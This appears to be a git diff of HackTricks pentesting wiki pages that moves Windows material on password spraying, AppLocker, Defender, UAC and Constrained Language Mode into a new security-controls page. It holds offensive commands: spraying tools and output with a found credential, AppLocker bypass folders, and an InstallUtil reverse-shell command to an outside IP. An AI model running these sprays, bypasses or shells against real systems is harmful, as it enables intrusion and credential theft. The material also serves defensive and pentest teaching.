+./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman ``` -Using [kerbrute](https://github.com/TarlogicSecurity/kerbrute)(python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK +* [_**spray**_](https://github.com/Greenwolf/Spray) _**(you can indicate number of attempts to avoid lockouts):**_ + +```bash +spray.sh -smb +``` + +* Using [**kerbrute**](https://github.com/TarlogicSecurity/kerbrute) (python) - NOT RECOMMENDED SOMETIMES DOESN'T WORK ```bash python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt ``` -**Kerbrute** also tells if a username is valid. +* With the `scanner/smb/smb_login` module of **Metasploit**: -Using [kerbrute](https://github.com/ropnop/kerbrute)(Go) +![](<../../.gitbook/assets/image (132) (1).png>) + +* Using **rpcclient**: ```bash -./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 -./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman +# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/ +for u in $(cat users.txt); do + rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority; +done ``` -With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: +#### From Windows + +* With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: ```bash # with a list of users @@ -82,31 +100,21 @@ With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module: .\Rubeus.exe brute /passwords: /outfile: ``` -With the `scanner/smb/smb_login` module of Metasploit: +* With [**Invoke-DomainPasswordSpray**](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) (It can generate users from the domain by default and it will get the password policy from the domain and limit tries according to it): -![](<../../.gitbook/assets/image (132) (1).png>) - -With [Invoke-DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1) - -```bash +```powershell Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose ``` -or **spray** (read next section). +* With [**Invoke-SprayEmptyPassword.ps1**](https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1)**** -### Lockout check - -The best way is not to try with more than 5/7 passwords per account. - -So you have to be very careful with password spraying because you could lockout accounts. To brute force taking this into mind, you can use [_**spray**_](https://github.com/Greenwolf/Spray)_**:**_ - -```bash -spray.sh -smb +``` +Invoke-SprayEmptyPassword ``` ## Outlook Web Access -There are multiples tools for password spraying outlook. +There are multiples tools for p**assword spraying outlook**. * With [MSF Owa\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_login/) * with [MSF Owa\_ews\_login](https://www.rapid7.com/db/modules/auxiliary/scanner/http/owa\_ews\_login/) @@ -117,25 +125,15 @@ There are multiples tools for password spraying outlook. To use any of these tools, you need a user list and a password / a small list of passwords to spray. ```bash -$ ./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose +./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose [x] Failed: larsson:Summer2020 [x] Failed: cube0x0:Summer2020 [x] Failed: a.admin:Summer2020 [x] Failed: c.cube:Summer2020 [+] Success: s.svensson:Summer2020 - [x] Failed: s.sven:Summer2020 - [x] Failed: j.jenny:Summer2020 - [x] Failed: t.teresa:Summer2020 - [x] Failed: t.trump:Summer2020 - [x] Failed: a.adams:Summer2020 - [x] Failed: l.larsson:Summer2020 - [x] Failed: CUBE0X0:Summer2020 - [x] Failed: A.ADMIN:Summer2020 - [x] Failed: C.CUBE:Summer2020 - [+] Success: S.SVENSSON:Summer2020 ``` -## References : +## References * [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying) * [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell) diff --git a/windows-hardening/basic-powershell-for-pentesters/README.md b/windows-hardening/basic-powershell-for-pentesters/README.md index dddf09392..3433a8f06 100644 --- a/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/windows-hardening/basic-powershell-for-pentesters/README.md @@ -4,15 +4,11 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** @@ -125,46 +121,9 @@ $command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.T More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) -## Constrained language +## [Constrained language](broken-reference) -```powershell -$ExecutionContext.SessionState.LanguageMode -#Values could be: FullLanguage or ConstrainedLanguage -``` - -### Bypass - -```powershell -#Easy bypass -Powershell -version 2 -``` - -In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**. - -#### Direct bypass: - -```bash -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe -``` - -#### Reverse shell: - -```bash -C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe -``` - -You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass the constrained mode. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). - -## AppLockerPolicy - -Check which files/extensions are blacklisted/whitelisted. - -```powershell -Get-ApplockerPolicy -Effective -xml -Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections -$a = Get-ApplockerPolicy -effective -$a.rulecollections -``` +## [AppLocker Policy](broken-reference) ## Enable WinRM (Remote PS) @@ -214,7 +173,7 @@ ValueData : 0 ### AMSI bypass - ** `amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything. +\*\* `amsi.dll`\*\* is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything. Therefore, the goal of the AMSI bypasses you will are are to **overwrite the instructions of that DLL in memory to make the detection useless**. @@ -468,14 +427,10 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** diff --git a/windows-hardening/windows-local-privilege-escalation/README.md b/windows-hardening/windows-local-privilege-escalation/README.md index 119b908bd..273bfefe6 100644 --- a/windows-hardening/windows-local-privilege-escalation/README.md +++ b/windows-hardening/windows-local-privilege-escalation/README.md @@ -40,6 +40,14 @@ [integrity-levels.md](integrity-levels.md) {% endcontent-ref %} +## Windows Security Controls + +There are different things in Windows that could **prevent you from enumerating the system**, run executables or even **detect your activities**. You should **read** the following **page** and **enumerate** all these **defenses** **mechanisms** before starting the privilege escalation enumeration: + +{% content-ref url="../windows-security-controls/" %} +[windows-security-controls](../windows-security-controls/) +{% endcontent-ref %} + ## System Info ### Version info enumeration @@ -347,54 +355,6 @@ reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT ``` -### AV - -Check is there is any anti virus running: - -```bash -WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more -Get-MpComputerStatus -``` - -### AppLocker Policy - -Check which files/extensions are blacklisted/whitelisted. - -```powershell -Get-ApplockerPolicy -Effective -xml -Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections -$a = Get-ApplockerPolicy -effective -$a.rulecollections -``` - -AppLocker rules applied to a host can also be read from the local registry at `HKLM\Software\Policies\Microsoft\Windows\SrpV2`. - -**Useful Writable folders to bypass AppLocker Policy** - -``` -C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys -C:\Windows\System32\spool\drivers\color -C:\Windows\Tasks -C:\windows\tracing -``` - -Commonly trusted [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker. - -**Poorly written rules could also be bypassed**, like ``, you can create a folder called allowed anywhere and it will be allowed. - -**DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using DLLs as backdoors will help bypassing AppLocker. - -You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). - -### UAC - -UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user.\ -[**More information about UAC here**](../authentication-credentials-uac-and-efs.md#uac). - -``` - reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ -``` - ## Users & Groups ### Enumerate Users & Groups @@ -426,7 +386,7 @@ If you **belongs to some privileged group you may be able to escalate privileges ### Token manipulation -**Learn more** about what is a **token** in this page: [**Windows Tokens**](../authentication-credentials-uac-and-efs.md#access-tokens).\ +**Learn more** about what is a **token** in this page: [**Windows Tokens**](../windows-security-controls/#access-tokens).\ Check the following page to **learn about interesting tokens** and how to abuse them: {% content-ref url="privilege-escalation-abusing-tokens/" %} @@ -1471,7 +1431,17 @@ while($true) ## From Administrator Medium to High Integrity Level / UAC Bypass -[**Read this to learn about Integrity Levels**](integrity-levels.md) **and** [**this to learn what is UAC**](../authentication-credentials-uac-and-efs.md#uac)**, then read how to**[ **bypass it**](../authentication-credentials-uac-and-efs.md#uac)**.** +Read this to **learn about Integrity Levels**: + +{% content-ref url="integrity-levels.md" %} +[integrity-levels.md](integrity-levels.md) +{% endcontent-ref %} + +Then **read this to learn about UAC and UAC bypasses:** + +{% content-ref url="../windows-security-controls/uac-user-account-control.md" %} +[uac-user-account-control.md](../windows-security-controls/uac-user-account-control.md) +{% endcontent-ref %} ## **From High Integrity to System** diff --git a/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/windows-hardening/windows-local-privilege-escalation/access-tokens.md index d75ba13e6..f6dbd2ca3 100644 --- a/windows-hardening/windows-local-privilege-escalation/access-tokens.md +++ b/windows-hardening/windows-local-privilege-escalation/access-tokens.md @@ -69,7 +69,7 @@ or using _Process Explorer_ from Sysinternals (select process and access"Securit ### Local administrator When a local administrator logins, **two access tokens are created**: One with admin rights and other one with normal rights. **By default**, when this user executes a process the one with **regular** (non-administrator) **rights is used**. When this user tries to **execute** anything **as administrator** ("Run as Administrator" for example) the **UAC** will be used to ask for permission.\ -If you want to [**learn more about the UAC read this page**](../authentication-credentials-uac-and-efs.md#uac)**.** +If you want to [**learn more about the UAC read this page**](../windows-security-controls/#uac)**.** ### Credentials user impersonation diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md index f68cb5159..1cedf9e00 100644 --- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md +++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking.md @@ -4,25 +4,19 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** -{% hint style="danger" %} If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). {% embed url="https://www.stmcyber.com/careers" %} -{% endhint %} ## Definition @@ -127,7 +121,7 @@ Other interesting automated tools to discover this vulnerability are **PowerSplo ### Example -In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../authentication-credentials-uac-and-efs.md#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\ +In case you find an exploitable scenario one of the most important things to successfully exploit it would be to **create a dll that exports at least all the functions the executable will import from it**. Anyway, note that Dll Hijacking comes handy in order to [escalate from Medium Integrity level to High **(bypassing UAC)**](../windows-security-controls/#uac) or from[ **High Integrity to SYSTEM**](./#from-high-integrity-to-system)**.** You can find an example of **how to create a valid dll** inside this dll hijacking study focused on dll hijacking for execution: [**https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows**](https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows)**.**\ Moreover, in the **next sectio**n you can find some **basic dll codes** that might be useful as **templates** or to create a **dll with non required functions exported**. ## **Creating and compiling Dlls** @@ -223,26 +217,20 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser } ``` -{% hint style="danger" %} If you are interested in **hacking carer** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). {% embed url="https://www.stmcyber.com/careers" %} -{% endhint %}
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/windows-hardening/windows-security-controls/README.md b/windows-hardening/windows-security-controls/README.md new file mode 100644 index 000000000..3dacb1f90 --- /dev/null +++ b/windows-hardening/windows-security-controls/README.md @@ -0,0 +1,241 @@ +# Windows Security Controls + +
+ +Support HackTricks and get benefits! + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** + +
+ +![](<../../.gitbook/assets/image (9) (1) (2).png>) + +Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Get Access Today: + +{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} + +## AppLocker Policy + +An application whitelist is a list of approved software applications or executables that are allowed to be present and run on a system. The goal is to protect the environment from harmful malware and unapproved software that does not align with the specific business needs of an organization. + +[AppLocker](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker) is Microsoft's **application whitelisting solution** and gives system administrators control over **which applications and files users can run**. It provides **granular control** over executables, scripts, Windows installer files, DLLs, packaged apps, and packed app installers. \ +It is common for organizations to **block cmd.exe and PowerShell.exe** and write access to certain directories, **but this can all be bypassed**. + +### Check + +Check which files/extensions are blacklisted/whitelisted: + +```powershell +Get-ApplockerPolicy -Effective -xml + +Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections + +$a = Get-ApplockerPolicy -effective +$a.rulecollections +``` + +AppLocker rules applied to a host can also be **read from the local registry** at **`HKLM\Software\Policies\Microsoft\Windows\SrpV2`**. + +### Bypass + +* Useful **Writable folders** to bypass AppLocker Policy: If AppLocker is allowing to execute anything inside `C:\Windows\System32` or `C:\Windows` there are **writable folders** you can use to **bypass this**. + +``` +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + +* Commonly **trusted** [**"LOLBAS's"**](https://lolbas-project.github.io/) binaries can be also useful to bypass AppLocker. +* **Poorly written rules could also be bypassed** + * For example, **``**, you can create a **folder called `allowed`** anywhere and it will be allowed. + * Organizations also often focus on **blocking the `%System32%\WindowsPowerShell\v1.0\powershell.exe` executable**, but forget about the **other** [**PowerShell executable locations**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) such as `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` or `PowerShell_ISE.exe`. +* **DLL enforcement very rarely enabled** due to the additional load it can put on a system, and the amount of testing required to ensure nothing will break. So using **DLLs as backdoors will help bypassing AppLocker**. +* You can use [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) or [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) to **execute Powershell** code in any process and bypass AppLocker. For more info check: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode). + +## Credentials Storage + +### Security Accounts Manager (SAM) + +Local credentials are present in this file, the passwords are hashed. + +### Local Security Authority (LSA) - LSASS + +The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\ +**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\ +LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user. + +The **credentials** are **saved** inside the **process LSASS**: Kerberos tickets, hashes NT and LM, easily decrypted passwords. + +### LSA secrets + +LSA could save in disk some credentials: + +* Password of the computer account of the Active Directory (unreachable domain controller). +* Passwords of the accounts of Windows services +* Passwords for scheduled tasks +* More (password of IIS applications...) + +### NTDS.dit + +It is the database of the Active Directory. It is only present in Domain Controllers. + +## Defender + +[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) **** is an Antivirus that is available in Windows 10 and Windows 11, and in versions of Windows Server. It **blocks** common pentesting tools such as **`WinPEAS`**. However, there are ways to **bypass these protections**. + +### Check + +To check the **status** of **Defender** you can execute the PS cmdlet **`Get-MpComputerStatus`** (check the value of **`RealTimeProtectionEnabled`** to know if it's active): + +
PS C:\> Get-MpComputerStatus
+
+[...]
+AntispywareEnabled              : True
+AntispywareSignatureAge         : 1
+AntispywareSignatureLastUpdated : 12/6/2021 10:14:23 AM
+AntispywareSignatureVersion     : 1.323.392.0
+AntivirusEnabled                : True
+[...]
+NISEnabled                      : False
+NISEngineVersion                : 0.0.0.0
+[...]
+RealTimeProtectionEnabled       : True
+RealTimeScanDirection           : 0
+PSComputerName                  :
+ +You could also run: + +```bash +WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more +``` + +## EFS (Encrypted File System) + +EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System). + +Examples of files being decrypted without the user asking for it: + +* Files and folders are decrypted before being copied to a volume formatted with another file system, like [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table). +* Encrypted files are copied over the network using the SMB/CIFS protocol, the files are decrypted before they are sent over the network. + +The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work). + +### Check EFS info + +Check if a **user** has **used** this **service** checking if this path exists:`C:\users\\appdata\roaming\Microsoft\Protect` + +Check **who** has **access** to the file using cipher /c \\ +You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files + +### Decrypting EFS files + +#### Being Authority System + +This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user. + +#### Knowing the users password + +{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %} + +## LAPS + +****[**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) allows you to **manage the local Administrator password** (which is **randomised**, unique, and **changed regularly**) on domain-joined computers. These passwords are centrally stored in Active Directory and restricted to authorised users using ACLs. If your user is given enough permissions you might be able to read the passwords of the local admins. + +{% content-ref url="../active-directory-methodology/laps.md" %} +[laps.md](../active-directory-methodology/laps.md) +{% endcontent-ref %} + +## PS Constrained Language Mode + +PowerShell **** [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **locks down many of the features** needed to use PowerShell effectively, such as blocking COM objects, only allowing approved .NET types, XAML-based workflows, PowerShell classes, and more. + +### **Check** + +```powershell +$ExecutionContext.SessionState.LanguageMode +#Values could be: FullLanguage or ConstrainedLanguage +``` + +### Bypass + +```powershell +#Easy bypass +Powershell -version 2 +``` + +In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). \ +**To compile it you may need** **to** _**Add a Reference**_ -> _Browse_ ->_Browse_ -> add `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` and **change the project to .Net4.5**. + +#### Direct bypass: + +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U 